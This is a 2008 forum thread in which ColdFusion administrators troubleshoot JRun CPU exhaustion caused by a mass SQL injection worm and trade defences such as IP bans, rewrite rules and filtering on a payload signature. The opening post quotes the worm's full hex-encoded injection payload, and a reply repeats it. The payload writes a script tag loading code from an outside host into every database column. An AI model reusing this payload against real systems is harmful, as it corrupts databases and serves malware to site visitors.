Jrun Pegging CPU

Report · Aug 08, 2008

We have coldfusion 8.01 Standard running on a Windows 2003. jrun has been peggin the CPU for days. We have installed fusion Reactor to monitior request and nothing seems to account for the CPU being pegged.

We had someone tring to hack into our server but we locked down our code and they are not getting into our sites but when they try it seems to pegging the system. Here is a sample of what they are doing to several of our sites:

2008-08-08 12:17:20.569 1218212240569 3 2114 COMPLETED "" jrpp-26 203.218.119.79 GET http://rockportusa.com/festival-event.cfm 16 20 504896 103523 136192 32668 "id=724';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Any ideas. We are dead in the water. Please HELP

Text

Report · Aug 08, 2008

VsVN wrote:
> We have coldfusion 8.01 Standard running on a Windows 2003. jrun has been
> peggin the CPU for days. We have installed fusion Reactor to monitior request
> and nothing seems to account for the CPU being pegged.
>
> We had someone tring to hack into our server but we locked down our code and
> they are not getting into our sites but when they try it seems to pegging the
> system. Here is a sample of what they are doing to several of our sites:
>
> 2008-08-08 12:17:20.569 1218212240569 3 2114 COMPLETED "" jrpp-26
> 203.218.119.79 GET http://rockportusa.com/festival-event.cfm 16 20 504896
> 103523 136192 32668
> "id=724';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
> 368617228323535292C40432076617263686172283430303029204445434C415245205461626C655
> F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D65206
> 6726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E696
> 43D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7
> 220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D313
> 63729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2020546
> 1626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415
> 455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B2
> 72B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633
> D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726
> 970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7
> 469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F6
> 3737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
> 6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205
> 461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20C
> HAR(4000));EXEC(@S);
>
> Any ideas. We are dead in the water. Please HELP

Text
>

This is a well know attack and it is generating *A LOT* of traffic right
now, not just against CF sites.

How do you have it locked down? I've seen reports where people have
protected their sites so that the attack fails in it's goal of appending
undesired text into the database. But the ferocity of the attack
generates SO MANY request, that it actually results in a denial of
service attack.

The general solution I've seen has been discussed to fight this as soon
as possible. I've heard of three affective defenses.

1) Code at the top of you CF application (Application.cfm or
Applciation.cfc) that detects the attack in the URL and ban's the IP
address it is from, so that all future requests from this IP are not
processed.

This stops the attack as fast as ColdFusion can, but if the attack is
ferocious enough, this may not be sufficient to save your server.

2) Stop it at the web server with isapi re-write techniques. More
sophisticated and stops it sooner, but all requests still need to be at
least briefly looked at by the server.

3) Stop it at the fire wall. The best and soonest way to stop it, but
takes a good firewall that may cost so money and|or a lot of manual
effort to keep up on top of it.

I believe some people are using all three.

Report · Aug 08, 2008

P.S. There are some great and extensive discussions on this attack and
the defenses on the House of Fusion [www.houseoffusion.com] cf-talk and
cf-community lists.

But as of this morning it was under *heavy* attack and may be still
suffering outages from it.

Report · Aug 08, 2008

We have done everything that you suggested but the CPU is still being pegged at 100% and FusionReactor has no request but jrun is at 99% CPU.

Any ideas what could be causing JRun to go crazy??

Report · Aug 09, 2008

If your SQL Server is running on the same machine, you need to understand that this worm attempts to append a Javascript hyperlink into EVERY COLUMN of EVERY RECORD of EVERY TABLE in your entire database. That will bring the SQL Server to its knees in short order.

The quick solution is to go find the various traps people have written that you can install into your Application.cfm file to stop any further contamination. Then you need to go Google the cure that is based on the same code as the infection. It will run through your database and attempt to remove the string from EVERY COLUMN of EVERY RECORD of EVERY TABLE so you're clean again.

Dave Morris
About ready to hire some goons and go kill me some hackers

Report · Aug 10, 2008

Our SQL Server is not running on the same machine. We have stopped the injections but our CPU is still pegging out with jrun. We are now on day 5 tring to figure this out.

Report · Aug 10, 2008

I presume you've already done things like changing your settings in CF Administrator. How much memory do you have, and how much free disk space for swap files and such. This may be an unrelated issue, so you might have to look in other JRUN CPU utilization threads. Sorry I can't be of more help.

Report · Aug 11, 2008

I would investigate ways to block traffic to any users who try accessing your site while passing DECLARE%20@S%20CHAR

I know several of our sites have implemented filters that return an error page immediately if this is passed. This check is done before any other processing, to save server load.

Also, you may want to check the CPU usage on your SQL server to see if that's spiked as well.

Report · Sep 08, 2008

I am on a shared server. I have some blocking code in my application.cfm file, but the request never even gets there, It is throwing the error: "Diagnostics: Application (wrong name: com/ms/asp/Application) null <br>The error occurred on line -1". There is no asp being run on the server. Somehow, even thoough it is throwing before line one of the application.cfm file, it is hitting the SQL server and filling up the page file. I cannot find any references to this error anywhere except that Google returns a single site that has this error occuring on it. Any isdea would be great.